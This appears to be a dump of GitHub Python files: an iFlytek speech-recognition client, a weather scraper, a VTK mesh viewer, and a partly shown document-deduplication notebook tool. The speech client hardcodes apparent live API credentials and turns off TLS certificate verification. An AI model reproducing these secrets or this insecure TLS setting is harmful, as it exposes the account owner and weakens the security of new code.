+{"seq_id": "42766121622", "text": "#### 讯飞语音接口识别\r\nimport websocket\r\nimport datetime\r\nimport hashlib\r\nimport base64\r\nimport hmac\r\nimport json\r\nfrom urllib.parse import urlencode\r\nimport time\r\nimport ssl\r\nfrom wsgiref.handlers import format_date_time\r\nfrom datetime import datetime\r\nfrom time import mktime\r\nimport _thread as thread\r\n\r\nSTATUS_FIRST_FRAME = 0 # 第一帧的标识\r\nSTATUS_CONTINUE_FRAME = 1 # 中间帧标识\r\nSTATUS_LAST_FRAME = 2 # 最后一帧的标识\r\n\r\n\r\nclass Ws_Param(object):\r\n # 初始化\r\n def __init__(self, APPID, APIKey, APISecret, AudioFile):\r\n self.APPID = APPID\r\n self.APIKey = APIKey\r\n self.APISecret = APISecret\r\n self.AudioFile = AudioFile\r\n\r\n # 公共参数(common)\r\n self.CommonArgs = {\"app_id\": self.APPID}\r\n # 业务参数(business),更多个性化参数可在官网查看\r\n self.BusinessArgs = {\"domain\": \"iat\", \"language\": \"zh_cn\", \"accent\": \"mandarin\", \"vinfo\": 1, \"vad_eos\": 10000,\r\n \"wbest\": 5, \"dwa\": \"wpgs\", \"ptt\": 0}\r\n\r\n def set_audiofile(self, path):\r\n self.AudioFile = path\r\n\r\n # 生成url\r\n def create_url(self):\r\n url = 'wss://ws-api.xfyun.cn/v2/iat'\r\n # 生成RFC1123格式的时间戳\r\n now = datetime.now()\r\n date = format_date_time(mktime(now.timetuple()))\r\n\r\n # 拼接字符串\r\n signature_origin = \"host: \" + \"ws-api.xfyun.cn\" + \"\\n\"\r\n signature_origin += \"date: \" + date + \"\\n\"\r\n signature_origin += \"GET \" + \"/v2/iat \" + \"HTTP/1.1\"\r\n # 进行hmac-sha256进行加密\r\n signature_sha = hmac.new(self.APISecret.encode('utf-8'), signature_origin.encode('utf-8'),\r\n digestmod=hashlib.sha256).digest()\r\n signature_sha = base64.b64encode(signature_sha).decode(encoding='utf-8')\r\n\r\n authorization_origin = \"api_key=\\\"%s\\\", algorithm=\\\"%s\\\", headers=\\\"%s\\\", signature=\\\"%s\\\"\" % (\r\n self.APIKey, \"hmac-sha256\", \"host date request-line\", signature_sha)\r\n authorization = base64.b64encode(authorization_origin.encode('utf-8')).decode(encoding='utf-8')\r\n # 将请求的鉴权参数组合为字典\r\n v = {\r\n \"authorization\": authorization,\r\n \"date\": date,\r\n \"host\": \"ws-api.xfyun.cn\"\r\n }\r\n # 拼接鉴权参数,生成url\r\n url = url + '?' + urlencode(v)\r\n # print(\"date: \",date)\r\n # print(\"v: \",v)\r\n # 此处打印出建立连接时候的url,参考本demo的时候可取消上方打印的注释,比对相同参数时生成的url与自己代码生成的url是否一致\r\n # print('websocket url :', url)\r\n return url\r\n\r\n\r\nwsParam = Ws_Param(APPID='928e7cbe', APISecret='Mzk2Mzg3NTExZjQyMDQ2YmEyZmU4Mjk3',\r\n APIKey='0ae993b84bc791fd8b7bd03a14790c74',\r\n AudioFile=r'reading_system/static/wav/20236115268眸.wav')\r\n\r\n\r\nclass Recognize(object):\r\n def __init__(self):\r\n self.rset = []\r\n\r\n # 收到websocket消息的处理\r\n def on_message(self, ws, message):\r\n try:\r\n code = json.loads(message)[\"code\"]\r\n sid = json.loads(message)[\"sid\"]\r\n if code != 0:\r\n errMsg = json.loads(message)[\"message\"]\r\n print(\"sid:%s call error:%s code is:%s\" % (sid, errMsg, code))\r\n\r\n else:\r\n data = json.loads(message)[\"data\"][\"result\"][\"ws\"]\r\n\r\n for i in data:\r\n for w in i[\"cw\"]:\r\n self.rset.append(w[\"w\"])\r\n except Exception as e:\r\n print(\"receive msg,but parse exception:\", e)\r\n\r\n # 收到websocket错误的处理\r\n def on_error(self, ws, error):\r\n # print(\"### error:\", error)\r\n pass\r\n\r\n # 收到websocket关闭的处理\r\n def on_close(self, ws, a, b):\r\n # print(\"### closed ###\")\r\n pass\r\n\r\n # 收到websocket连接建立的处理\r\n def on_open(self, ws):\r\n def run(*args):\r\n frameSize = 8000 # 每一帧的音频大小\r\n intervel = 0.04 # 发送音频间隔(单位:s)\r\n status = STATUS_FIRST_FRAME # 音频的状态信息,标识音频是第一帧,还是中间帧、最后一帧\r\n with open(wsParam.AudioFile, \"rb\") as fp:\r\n while True:\r\n buf = fp.read(frameSize)\r\n # 文件结束\r\n if not buf:\r\n status = STATUS_LAST_FRAME\r\n # 第一帧处理\r\n # 发送第一帧音频,带business 参数\r\n # appid 必须带上,只需第一帧发送\r\n if status == STATUS_FIRST_FRAME:\r\n\r\n d = {\"common\": wsParam.CommonArgs,\r\n \"business\": wsParam.BusinessArgs,\r\n \"data\": {\"status\": 0, \"format\": \"audio/L16;rate=16000\",\r\n \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n \"encoding\": \"raw\"}}\r\n d = json.dumps(d)\r\n ws.send(d)\r\n status = STATUS_CONTINUE_FRAME\r\n # 中间帧处理\r\n elif status == STATUS_CONTINUE_FRAME:\r\n d = {\"data\": {\"status\": 1, \"format\": \"audio/L16;rate=16000\",\r\n \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n \"encoding\": \"raw\"}}\r\n ws.send(json.dumps(d))\r\n # 最后一帧处理\r\n elif status == STATUS_LAST_FRAME:\r\n d = {\"data\": {\"status\": 2, \"format\": \"audio/L16;rate=16000\",\r\n \"audio\": str(base64.b64encode(buf), 'utf-8'),\r\n \"encoding\": \"raw\"}}\r\n ws.send(json.dumps(d))\r\n time.sleep(1)\r\n break\r\n # 模拟音频采样间隔\r\n time.sleep(intervel)\r\n ws.close()\r\n\r\n thread.start_new_thread(run, ())\r\n\r\n def recognize(self, path):\r\n self.rset = []\r\n wsParam.set_audiofile(path)\r\n websocket.enableTrace(False)\r\n wsUrl = wsParam.create_url()\r\n ws = websocket.WebSocketApp(wsUrl, on_message=self.on_message, on_error=self.on_error,\r\n on_close=self.on_close)\r\n ws.on_open = self.on_open\r\n ws.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\r\n return self.rset\r\n\r\n\r\nifly_recognize = Recognize()\r\n", "repo_name": "NJNUqhx/ReadingSystem", "sub_path": "TestReadingSystem/reading_system/utils/Voice2.py", "file_name": "Voice2.py", "file_ext": "py", "file_size_in_byte": 6682, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "name"}, {"api_name": "wsgiref.handlers.format_date_time", "line_number": 43, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 43, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 50, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 51, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 52, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 56, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 64, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 84, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 85, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 91, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 129, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 131, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 137, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 139, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 143, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 145, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 146, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 149, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 152, "usage_type": "call"}, {"api_name": "websocket.enableTrace", "line_number": 157, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 159, "usage_type": "call"}, {"api_name": "ssl.CERT_NONE", "line_number": 162, "usage_type": "attribute"}]}
+{"seq_id": "11764654409", "text": "from lxml import html\n\ndef frsn_wx(): \n #Loads 93704 weather forcast page\n page = requests.get('http://bit.ly/2dDCkAt')\n #Loads html xpage content\n tree = html.fromstring(page.content)\n #Takes text value from p class\n temp = tree.xpath('//p[@class=\"myforecast-current-lrg\"]/text()')\n #Convers temp to a string and slices off garbage\n wex = str(temp)[3:5]\n #Converts wex to a integer just incase\n wx = int(wex)\n print ('It is currently {}F in Fresno, Ca'.format(wx))\n\nfrsn_wx()\n", "repo_name": "n6osb/fresno_wx", "sub_path": "wx_report.py", "file_name": "wx_report.py", "file_ext": "py", "file_size_in_byte": 513, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lxml.html.fromstring", "line_number": 7, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 7, "usage_type": "name"}]}
+{"seq_id": "70196267690", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 03 17:58:12 2016\n\n@author: Ben\n\"\"\"\nfrom __future__ import (nested_scopes, generators, division, absolute_import,\n print_function, unicode_literals)\nimport vtk\nfrom vtk import vtkQuad\n\nclass MeshViewer(object):\n \n def __init__(self, mesh):\n self.mesh = mesh\n \n def render(self):\n self._generate_points()\n self._build_quads()\n self._build_viewing_heirarchy()\n self.renderWindow.Render()\n self.interactor.Start()\n \n def _generate_points(self):\n self.points = vtk.vtkPoints()\n for node in self.mesh.nodes:\n self.points.InsertNextPoint(node.location)\n \n def _build_quads(self):\n \n self.cellArray = vtk.vtkCellArray()\n \n for element in self.mesh.elements:\n quad = vtkQuad()\n quad.GetPointIds().SetId(0, element.nodes[0].id)\n quad.GetPointIds().SetId(1, element.nodes[1].id)\n quad.GetPointIds().SetId(2, element.nodes[2].id)\n quad.GetPointIds().SetId(3, element.nodes[3].id)\n \n self.cellArray.InsertNextCell(quad)\n \n def _build_viewing_heirarchy(self):\n self.poly = vtk.vtkPolyData()\n self.poly.SetPoints(self.points)\n self.poly.SetPolys(self.cellArray)\n \n self.mapper = vtk.vtkPolyDataMapper()\n self.mapper.SetInput(self.poly)\n \n self.actor = vtk.vtkActor()\n self.actor.SetMapper(self.mapper)\n self.actor.GetProperty().SetInterpolationToFlat()\n self.actor.GetProperty().SetEdgeColor(1.0, 0.0, 0.0) #(R,G,B)\n self.actor.GetProperty().EdgeVisibilityOn()\n \n self.renderer = vtk.vtkRenderer()\n self.renderer.AddActor(self.actor)\n \n self.renderWindow = vtk.vtkRenderWindow()\n self.renderWindow.AddRenderer(self.renderer)\n \n self.interactor = vtk.vtkRenderWindowInteractor()\n self.interactor.SetRenderWindow(self.renderWindow)", "repo_name": "BenjaminETaylor/strangle", "sub_path": "strengl/analyze/fea/viewer.py", "file_name": "viewer.py", "file_ext": "py", "file_size_in_byte": 2057, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vtk.vtkPoints", "line_number": 25, "usage_type": "call"}, {"api_name": "vtk.vtkCellArray", "line_number": 31, "usage_type": "call"}, {"api_name": "vtk.vtkQuad", "line_number": 34, "usage_type": "call"}, {"api_name": "vtk.vtkPolyData", "line_number": 43, "usage_type": "call"}, {"api_name": "vtk.vtkPolyDataMapper", "line_number": 47, "usage_type": "call"}, {"api_name": "vtk.vtkActor", "line_number": 50, "usage_type": "call"}, {"api_name": "vtk.vtkRenderer", "line_number": 56, "usage_type": "call"}, {"api_name": "vtk.vtkRenderWindow", "line_number": 59, "usage_type": "call"}, {"api_name": "vtk.vtkRenderWindowInteractor", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "28430482268", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 5 16:09:13 2022\n\n@author: sjuf9909\n@reviewer/reviser: Chao Sun@SIH\n\"\"\"\n# import required packages\nimport codecs\nimport hashlib\nimport io\nimport os\nimport zipfile\nfrom tqdm import tqdm\nfrom zipfile import ZipFile\nfrom pathlib import Path\nfrom itertools import chain\nimport re\n\nfrom IPython.display import clear_output\n\n# import tools to calculate Jaccard similarity\nfrom datasketch import MinHash, MinHashLSH\n\n# pandas and numpy: tools for data processing\nimport pandas as pd\nimport numpy as np\n\n# matplotlib & seaborn: visualization tools\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport swifter\n\n# Bokeh: interactive plots\nfrom bokeh.io import output_notebook\nfrom bokeh.models import ColorBar, LabelSet, ColumnDataSource, HoverTool\nfrom bokeh.plotting import figure, show\nfrom bokeh.transform import linear_cmap\nfrom bokeh.models import FuncTickFormatter \noutput_notebook()\n\n# html visualization\nfrom diffviz import html_diffs\n\n# NLTK and gensim: natural language processing tools for working with language/text data\nimport nltk\nfrom nltk import ngrams\nfrom gensim.utils import tokenize\n\n# ipywidgets: tools for interactive browser controls in Jupyter notebooks\nimport ipywidgets as widgets\nfrom ipywidgets import Layout\nfrom IPython.display import display, clear_output, FileLink, HTML\n\n# import other packages\nfrom utils import get_projectpaths\n(projectroot, rawdatapath, cleandatapath, processeddatapath) = get_projectpaths()\n\n\nclass DownloadFileLink(FileLink):\n '''\n Create link to download files in Jupyter Notebook\n '''\n html_link_str = \"{link_text} \"\n\n def __init__(self, path, file_name=None, link_text=None, *args, **kwargs):\n super(DownloadFileLink, self).__init__(path, *args, **kwargs)\n\n self.file_name = file_name or os.path.split(path)[1]\n self.link_text = link_text or self.file_name\n\n def _format_path(self):\n from html import escape\n\n fp = \"\".join([self.url_prefix, escape(self.path)])\n return \"\".join(\n [\n self.result_html_prefix,\n self.html_link_str.format(\n link=fp, file_name=self.file_name, link_text=self.link_text\n ),\n self.result_html_suffix,\n ]\n )\n \n\nclass DocumentSimilarity():\n '''\n Using Jaccard similarity to identify similar documents in a corpus\n '''\n def __init__(self):\n '''\n Initiate the DocumentSimilarity\n '''\n # initiate other necessary variables\n self.large_file_size = 1000000\n self.exclude_punc = False\n \n # create an output folder if not already exist\n os.makedirs('output', exist_ok=True)\n \n # initiate the variables for file uploading\n self.file_uploader = widgets.FileUpload(\n description='Upload your files (txt, csv, xlsx or zip)',\n accept='.txt, .xlsx, .csv, .zip', # accepted file extension\n multiple=True, # True to accept multiple files\n error='File upload unsuccessful. Please try again!',\n layout = widgets.Layout(width='320px')\n )\n \n self.upload_out = widgets.Output()\n \n # give notification when file is uploaded\n def _cb(change):\n with self.upload_out:\n if self.file_uploader.value!=():\n # clear output and give notification that file is being uploaded\n clear_output()\n \n # check file size\n self.check_file_size(self.file_uploader)\n \n # reading uploaded files\n self.process_upload()\n \n # give notification when uploading is finished\n print('Finished uploading files.')\n print('{} text documents are loaded for tagging.'.format(self.text_df.shape[0]))\n \n # clear saved value in cache and reset counter\n self.file_uploader.value = ()\n \n # observe when file is uploaded and display output\n self.file_uploader.observe(_cb, names='value')\n self.upload_box = widgets.VBox([self.file_uploader, self.upload_out])\n \n # CSS styling \n self.style = \"\"\"\n \n \"\"\"\n \n \n def click_button_widget(\n self, \n desc: str, \n margin: str='10px 0px 0px 10px',\n width='320px'\n ):\n '''\n Create a widget to show the button to click\n \n Args:\n desc: description to display on the button widget\n margin: top, right, bottom and left margins for the button widget\n '''\n # widget to show the button to click\n button = widgets.Button(description=desc, \n layout=Layout(margin=margin, width=width),\n style=dict(font_style='italic',\n font_weight='bold'))\n \n # the output after clicking the button\n out = widgets.Output()\n \n return button, out\n \n \n def check_file_size(self, uploaded_file):\n '''\n Function to check the uploaded file size\n \n Args:\n uploaded_file: the uploaded file containing the text data\n '''\n # check total uploaded file size\n total_file_size = sum([file['size'] for file in uploaded_file.value])\n print('The total size of the upload is {:.2f} MB.'.format(total_file_size/1000000))\n \n # display warning for individual large files (>1MB)\n large_text = [file['name'] for file in uploaded_file.value \\\n if file['size']>self.large_file_size and \\\n file['name'].endswith('.txt')]\n if len(large_text)>0:\n print('The following file(s) are larger than 1MB:', large_text)\n \n \n def extract_zip(self, zip_file):\n '''\n Load zip file\n \n Args:\n zip_file: the file containing the zipped data\n '''\n # create an input folder if not already exist\n os.makedirs('input', exist_ok=True)\n \n # read and decode the zip file\n temp = io.BytesIO(zip_file['content'])\n \n # open and extract the zip file\n with ZipFile(temp, 'r') as zip:\n # extract files\n print('Extracting {}...'.format(zip_file['name']))\n zip.extractall('./input/')\n \n # clear up temp\n temp = None\n \n \n def load_txt(self, file, n) -> list:\n '''\n Load individual txt file content and return a dictionary object, \n wrapped in a list so it can be merged with list of pervious file contents.\n \n Args:\n file: the file containing the text data\n n: index of the uploaded file (value='unzip' if the file is extracted form a zip file\n '''\n # read the unzip text file\n if n=='unzip':\n # read the unzip text file\n with open(file) as f:\n temp = {'text_name': file.name[:-4],\n 'text': f.read()\n }\n \n os.remove(file)\n else:\n file = self.file_uploader.value[n]\n # read and decode uploaded text\n temp = {'text_name': file['name'][:-4],\n 'text': codecs.decode(file['content'], encoding='utf-8', errors='replace')\n }\n \n # check for unknown characters and display warning if any\n unknown_count = temp['text'].count('�')\n if unknown_count>0:\n print('We identified {} unknown character(s) in the following text: {}'.format(unknown_count, file['name'][:-4]))\n \n return [temp]\n\n\n def load_table(self, file, n) -> list:\n '''\n Load csv or xlsx file\n \n Args:\n file: the file containing the excel or csv data\n n: index of the uploaded file (value='unzip' if the file is extracted form a zip file\n '''\n if n!='unzip':\n file = io.BytesIO(self.file_uploader.value[n]['content'])\n \n # read the file based on the file format\n try:\n temp_df = pd.read_csv(file)\n except:\n temp_df = pd.read_excel(file)\n \n # check if the column text and text_name present in the table, if not, skip the current spreadsheet\n if ('text' not in temp_df.columns) or ('text_name' not in temp_df.columns):\n print('File {} does not contain the required header \"text\" and \"text_name\"'.format(self.file_uploader.value[n]['name']))\n return []\n \n # return a list of dict objects\n temp = temp_df[['text_name', 'text']].to_dict(orient='index').values()\n \n return temp\n \n \n def hash_gen(self, temp_df: pd.DataFrame) -> pd.DataFrame:\n '''\n Create column text_id by md5 hash of the text in text_df\n \n Args:\n temp_df: the temporary pandas dataframe containing the text data\n '''\n temp_df['text_id'] = temp_df['text'].apply(\n lambda t: hashlib.shake_256(t.encode('utf-8')).hexdigest(5))\n \n return temp_df\n \n \n def process_upload(self, deduplication: bool = True):\n '''\n Pre-process uploaded .txt files into pandas dataframe\n\n Args:\n deduplication: option to deduplicate text_df by text_id\n '''\n # create placeholders to store all texts and zipped file names\n all_data = []; files = []\n \n # read and store the uploaded files\n uploaded_files = self.file_uploader.value\n \n # extract zip files (if any)\n for n, file in enumerate(uploaded_files):\n files.append([file.name, n])\n if file.name.lower().endswith('zip'):\n self.extract_zip(self.file_uploader.value[n])\n files.pop()\n \n # add extracted files to files\n for file_type in ['*.txt', '*.xlsx', '*.csv']:\n files += [[file, 'unzip'] for file in Path('./input').rglob(file_type) if 'MACOSX' not in str(file)]\n \n print('Reading uploaded files...')\n print('This may take a while...')\n # process and upload files\n for file, n in tqdm(files):\n # process text files\n if str(file).lower().endswith('txt'):\n text_dic = self.load_txt(file, n)\n # process xlsx or csv files\n else:\n text_dic = self.load_table(file, n)\n all_data.extend(text_dic)\n \n # remove files and directory once finished\n os.system('rm -r ./input')\n \n # convert them into a pandas dataframe format and add unique id\n self.text_df = pd.DataFrame.from_dict(all_data)\n self.text_df = self.hash_gen(self.text_df)\n \n # clear up all_data\n all_data = []; files = []\n \n # deduplicate the text_df by text_id\n if deduplication:\n self.text_df.drop_duplicates(subset='text_id', keep='first', inplace=True)\n \n \n def calculate_similarity(self, \n ngram_value: int = 1, \n num_perm: int = 256, \n similarity_cutoff: float = 0.5, \n actual_jaccard: bool = False):\n '''\n Function to calculate/estimate Jaccard similarity between documents in the corpus\n and begin the process of deduplicating based on the specified parameters\n\n Args:\n ngram_value: the n-gram size (the number of words used to detect similarity)\n num_perm: the number of permutation functions for estimating Jaccard similarity\n similarity_cutoff: the Jaccard similarity cut-off for determining similar documents\n actual_jaccard: whether to calculate actual or estimated Jaccard similarity\n remove_punc: whether to remove punctuation from the text\n '''\n try:\n def clean_text(text):\n '''\n Function to clean the text\n\n Args:\n text: the text to be cleaned\n '''\n # remove punctuation\n text = re.sub(r'[^\\w\\s]', ' ', text) \n \n return text\n \n if self.exclude_punc:\n self.text_df['text_with_punc'] = self.text_df['text']\n print('Pre-processing uploaded text...')\n tqdm.pandas()\n self.text_df['text'] = self.text_df['text'].progress_apply(clean_text)\n \n # Step 1: calculate word counts\n # tqdm.pandas(desc='Step 1/9',leave=False)\n # self.text_df['word_count'] = self.text_df.progress_apply(\n # lambda x: self.count_text_words(x.text), \n # axis=1)\n \n self.text_df['word_count'] = self.text_df.swifter.progress_bar(desc='Step 1/9').apply(\n lambda x: self.count_text_words(x.text), \n axis=1\n )\n \n # # Step 2: create text hash (to be used for estimating Jaccard similarity)\n # tqdm.pandas(desc='Step 2/9',leave=False)\n # self.text_df['hash'] = self.text_df.progress_apply(\n # lambda x: self.make_text_hash(x.text, \n # num_perm, \n # ngram_value), \n # axis=1)\n \n \n # Step 2: create text hash (to be used for estimating Jaccard similarity)\n # tqdm.pandas(desc='Step 2/9',leave=False)\n self.text_df['hash'] = self.text_df.swifter.progress_bar(desc='Step 2/9').apply(\n lambda x: self.make_text_hash(x.text, num_perm, ngram_value), \n axis=1\n )\n \n # Step 3 and 4: identify similar documents based on estimated Jaccard similarity\n # Create LSH index\n lsh = MinHashLSH(threshold=similarity_cutoff, num_perm=num_perm)\n \n for index, row in tqdm(self.text_df.iterrows(), \n total=len(self.text_df),\n desc='Step 3/9',leave=False):\n lsh.insert(row['text_id'], row['hash'])\n \n #print('Step 4/9...')\n # tqdm.pandas(desc='Step 4/9',leave=False)\n # self.text_df['matched_list'] = self.text_df.progress_apply(\n # lambda x: self.get_matches(lsh, \n # x.hash, \n # x.text_id), \n # axis=1)\n self.text_df['matched_list'] = self.text_df.swifter.progress_bar(desc='Step 4/9').apply(\n lambda x: self.get_matches(lsh, \n x.hash, \n x.text_id), \n axis=1)\n \n # Step 5: calculate actual or estimate Jaccard similarity\n # tqdm.pandas(desc='Step 5/9',leave=False)\n self.text_df['jaccards'] = self.text_df.swifter.progress_bar(desc='Step 5/9').apply(\n lambda x: self.get_jaccards(\n df=self.text_df, \n original=x.text_id, \n matched_list= x.matched_list, \n ngram_value=ngram_value,\n actual_jaccard=actual_jaccard), axis=1)\n \n # Step 6 & 7: collating list of similar documents\n # tqdm.pandas(desc='Step 6/9',leave=False)\n intermediate_df = self.text_df[['matched_list', \n 'text_id', \n 'text_name',\n 'jaccards']].copy()\n intermediate_df['listlen'] = intermediate_df.swifter.progress_bar(desc='Step 6/9').apply(\n lambda x: len(x.matched_list), axis = 1)\n \n # tqdm.pandas(desc='Step 7/9',leave=False)\n intermediate_df = intermediate_df[intermediate_df.listlen > 0]\n intermediate_df['text_id_duped'] = intermediate_df.swifter.progress_bar(desc='Step 7/9').apply(\n lambda x: [x.text_id] * x.listlen, axis = 1)\n \n self.deduplication_df = pd.DataFrame(\n {\n 'text_id2' : self.explode_list(intermediate_df, 'matched_list'),\n 'similarity': self.explode_list(intermediate_df, 'jaccards'),\n 'text_id1': self.explode_list(intermediate_df, 'text_id_duped'),\n }\n )\n \n # join with article dates (from metadata)\n metadata_df = self.text_df[['text_id', 'text_name', 'word_count']].copy()\n \n self.deduplication_df = self.deduplication_df.merge(\n metadata_df,\n left_on='text_id1', \n right_on='text_id', \n how='inner').drop('text_id', axis=1).merge(\n metadata_df, \n left_on='text_id2', \n right_on='text_id',\n suffixes=('1', '2'),\n how='left').drop('text_id', axis=1)\n \n # get similar documents id\n self.similar_doc_id = self.get_duplicate_ids(\n self.deduplication_df,\n similarity_cutoff)\n \n # Step 8: removing duplication from list of similar documents\n keep_index = {'index': [],\n 'text_pair': []}\n for index, row in tqdm(self.deduplication_df.iterrows(), \n total=len(self.deduplication_df),\n desc='Step 8/9',leave=False):\n if set([row.text_id1,row.text_id2]) not in keep_index['text_pair']:\n keep_index['index'].append(index)\n keep_index['text_pair'].append(set([row.text_id1,row.text_id2]))\n \n self.deduplication_df = self.deduplication_df[self.deduplication_df.index.isin(keep_index['index'])]\n \n # Step 9: recommendation to keep or remove and deduplciate documents\n #print('Step 9/9...')\n status1 = []; status2 = []\n for index, row in tqdm(self.deduplication_df.iterrows(), \n total=len(self.deduplication_df),\n desc='Step 9/9'):\n if row.text_id1 in self.similar_doc_id:\n status1.append('remove')\n else:\n status1.append('keep')\n if row.text_id2 in self.similar_doc_id:\n status2.append('remove')\n else:\n status2.append('keep')\n \n self.deduplication_df['status1'] = status1\n self.deduplication_df['status2'] = status2\n \n column_names = ['text_id1', 'text_name1', 'word_count1', 'status1',\n 'similarity',\n 'text_id2', 'text_name2', 'word_count2', 'status2']\n self.deduplication_df = self.deduplication_df.reindex(columns=column_names)\n self.deduplication_df = self.deduplication_df.sort_values(by='similarity', ascending=False).reset_index(drop=True)\n self.deduplication_df = self.deduplication_df[self.deduplication_df['similarity']>=similarity_cutoff]\n \n self.deduplicated_text_df = self.text_df[~self.text_df.text_id.isin(self.similar_doc_id)]\n clear_output(wait=True)\n\n print('{} pair of similar documents found in the corpus.'.format(len(self.deduplication_df)))\n \n except:\n print('No similar documents found. Please use lower simiarity cutoff to find similar documents...')\n \n \n def display_deduplication_list(self): \n '''\n Function to display deduplication text list \n '''\n # display in html format for styling purpose\n df_html = self.deduplication_df.to_html(escape=False)\n \n # Concatenating to single string\n df_html = self.style+''+df_html+\"\\n
\"\n \n # display the pair of similar texts\n display(HTML(df_html))\n \n \n def update_list(self, \n index: int, \n item: list):\n '''\n Function to update duplicated documents list based on selected action\n (whether to 'keep' or 'remove' duplicated documents)\n\n Args:\n index: the row index of the pair of documents being reviewed\n item: a list containing text_id and status ('keep' or 'remove') of the documents\n '''\n if self.deduplication_df[item[1]][index]=='remove':\n if self.deduplication_df[item[0]][index] not in self.similar_doc_id:\n self.similar_doc_id.append(self.deduplication_df[item[0]][index])\n else:\n if self.deduplication_df[item[0]][index] in self.similar_doc_id:\n self.similar_doc_id.remove(self.deduplication_df[item[0]][index])\n \n \n def save_to_csv(self, \n df: pd.DataFrame,\n out_dir: str,\n file_name: str):\n '''\n Function to save tagged texts to csv file\n \n Args:\n out_dir: the output file directory\n file_name: the name of the saved file\n '''\n # split into chunks\n chunks = np.array_split(df.index, len(df)) \n \n # save the tagged text into csv\n for chunck, subset in enumerate(tqdm(chunks)):\n if chunck == 0:\n df.loc[subset].to_csv(out_dir+file_name, \n mode='w', \n index=True)\n else:\n df.loc[subset].to_csv(out_dir+file_name, \n header=None, \n mode='a', \n index=True)\n \n \n def display_deduplication_text(self):\n '''\n Function to display pair of possible duplicated texts\n '''\n # output the list of identified duplicated texts and the recommendations\n list_out = widgets.Output()\n \n with list_out:\n self.display_deduplication_list()\n \n # widgets for selecting the row index containing pair of similar documents to review\n enter_index, index = self.select_n_widget('Select row index: ', 0)\n \n # widget to display pair of similar documents to review\n display_button, display_out = self.click_button_widget(desc='Display pair of texts', \n margin='20px 0px 10px 0px',\n width='150px')\n \n # options on what to do with pair of similar documents\n act_options = ['keep left text only', 'keep right text only', \n 'keep both', 'remove both']\n \n # default action shown based on recommendation by the tool\n default_action = {'keep & remove':act_options[0],\n 'remove & keep':act_options[1],\n 'keep & keep':act_options[2],\n 'remove & remove':act_options[3]}\n \n # widget to select action\n enter_action, select_action = self.select_options('Select action: ',\n ['None'],\n 'None')\n \n # widget to update selection based on selected action\n update_button, update_out = self.click_button_widget(desc='Update selection', \n margin='20px 0px 10px 0px',\n width='150px')\n \n nextpair_button, display_out = self.click_button_widget(desc='Next pair', \n margin='20px 0px 10px 0px',\n width='150px')\n \n prevpair_button, display_out = self.click_button_widget(desc='Previous pair', \n margin='20px 0px 10px 0px',\n width='150px')\n \n # function to define what happens when the display button is clicked\n def on_display_button_clicked(_):\n with display_out:\n clear_output()\n text_pair = self.deduplication_df[\n self.deduplication_df.index == index.value].iloc[0,:].squeeze()\n self.show_comparison(text_pair)\n \n select_action.options = act_options\n select_action.value = default_action['{} & {}'.format(text_pair.status1,\n text_pair.status2)]\n \n with save_out:\n clear_output()\n \n \n # function to define what happens when the prev button is clicked\n def on_prev_button_clicked(_):\n with display_out:\n clear_output()\n index.value = max(self.deduplication_df.index.min(), index.value-1)\n text_pair = self.deduplication_df[\n self.deduplication_df.index == index.value].iloc[0,:].squeeze()\n self.show_comparison(text_pair)\n \n select_action.options = act_options\n select_action.value = default_action['{} & {}'.format(text_pair.status1,\n text_pair.status2)]\n \n with save_out:\n clear_output()\n\n # function to define what happens when the prev button is clicked\n def on_next_button_clicked(_):\n with display_out:\n clear_output()\n index.value = min(self.deduplication_df.index.max(), index.value+1)\n text_pair = self.deduplication_df[\n self.deduplication_df.index == index.value].iloc[0,:].squeeze()\n self.show_comparison(text_pair)\n \n select_action.options = act_options\n select_action.value = default_action['{} & {}'.format(text_pair.status1,\n text_pair.status2)]\n \n with save_out:\n clear_output()\n \n # link the display_button with the function\n display_button.on_click(on_display_button_clicked)\n prevpair_button.on_click(on_prev_button_clicked)\n nextpair_button.on_click(on_next_button_clicked)\n \n # function to define what happens when the update button is clicked\n def on_update_button_clicked(_):\n with update_out:\n clear_output()\n chosen_action = select_action.value\n for k, v in default_action.items():\n if chosen_action==v:\n self.deduplication_df.iloc[index.value,3]=k.split(' & ')[0]\n item = ['text_id1','status1']\n self.update_list(index.value, item)\n self.deduplication_df.iloc[index.value,-1]=k.split(' & ')[1]\n item = ['text_id2','status2']\n self.update_list(index.value, item)\n \n with list_out:\n clear_output()\n self.display_deduplication_list()\n \n with display_out:\n clear_output()\n text_pair = self.deduplication_df[\n self.deduplication_df.index == 